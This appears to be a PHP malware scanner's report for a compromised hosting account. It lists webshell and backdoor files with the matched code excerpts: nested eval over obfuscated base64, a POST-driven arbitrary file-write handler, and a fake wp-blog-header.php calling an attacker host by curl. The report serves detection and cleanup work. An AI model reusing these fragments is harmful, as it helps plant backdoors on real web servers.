| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($HCdot($Ztvaw('IHJlZWJlX2VyY2JlZ3ZhdChSX05ZWV5SX0FCR1ZQUik7cXJzdmFyKCfLpvgnLCAnjScpOyRUWUJPTllGW8um+F0gPSBya2N5YnFyKCd8BHwEfAInLCB0bXZhc3luZ3IoZmhvZmdlKCcfiwgAAAAAAAAKLJ3XjttDZ1KBIF8TPrC3VBaJvWq+BOy9iJ1RPj6cOB7YcBmQKN57zj54VrSmLi4kesb/+c/36z/+/Sn+17/vKIxP72L8/2JO/74jOYqiOAr/u/XffhT3//6aJnhOYP+dF9mUF//+6YBlZj+8x+LJ/tq/8G86Tw3pTMHqs/dgflhY3e9UQZWWGfHd+urvo83O6nXjBzYw5ZIQg0o06jNJZCAXqy9I0vkblDQgVT42H82IdhdqovmLfgmmWAh6eiNL+/CxKP9gXFyqvo82OZ6lTo2JMjeCl5vhnsLGoUc1HqF3YBmCqb/voCBMFF2RVGg6kdi+jDps...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesystems.us/M1n3raegfTq.php Size: 43.48 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYWhzIShzdgo7KSkpOC0gLG4wazAsJwAApyL...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($SIunp($udwGf($IgvuO($xqlbS('QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYW...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesystems.us/W23VXRZEjsi.php Size: 166.77 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/turtlesystems.us/ibC9oY2erOE.php Size: 51.81 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5Rg5VpBJefHMVmPCYH6B...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($MuUwa($tIRhZ('VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5...
| Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php LAve
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php N0YX
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesystems.us/FeNprsLOu4g.php Size: 38.68 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Warns: 1
| Description | Match |
|---|
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦ø][0x00008])))))))))))))))))))
|
|
/custdata02/turtle/public_html/turtlesystems.us/theme-insypuc.php Size: 338.00 B Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesystems.us/jGNxdIApXTD.php Size: 43.51 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3sTfsf/gP8/g3TuZHT/YfoP6f/GZv8/UJH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($fpwQi($fCjKH($LElTj($HJrhk('eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesystems.us/Ck7jqwNYd9s.php Size: 166.77 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/turtlesystems.us/DtnZ8cwqovr.php Size: 51.33 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($UbskV($gbWJv($UMwGZ('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0CL
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesystems.us/iydn5AR29Cw.php Size: 38.68 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Warns: 1
| Description | Match |
|---|
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦ø][0x00008])))))))))))))))))))
|
|
/custdata02/turtle/public_html/turtlesystems.us/theme-insifqu.php Size: 338.00 B Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/ssl/certs/index.php Size: 15.44 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 05:39:22 Warns: 2 Dangers: 11
| Description | Match |
|---|
Exploit base64_long Line: 8 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 7 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request | <?php ${"_GET"}
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}
| Function eval Line: 9 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 301ca578 Dangerous Malware Signature (hash: 301ca578) | <?php trojan
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/ssl/certs/admin.php Size: 1.49 kB Created: 2023-09-06 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/ssl/certs/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/ssl/csrs/themes.php Size: 1.49 kB Created: 2023-02-07 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/ssl/csrs/about.php Size: 1.49 kB Created: 2023-04-23 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/ssl/csrs/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/ssl/keys/admin.php Size: 1.49 kB Created: 2023-11-01 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/ssl/keys/dropdown.php Size: 1.49 kB Created: 2023-06-05 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/ssl/keys/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
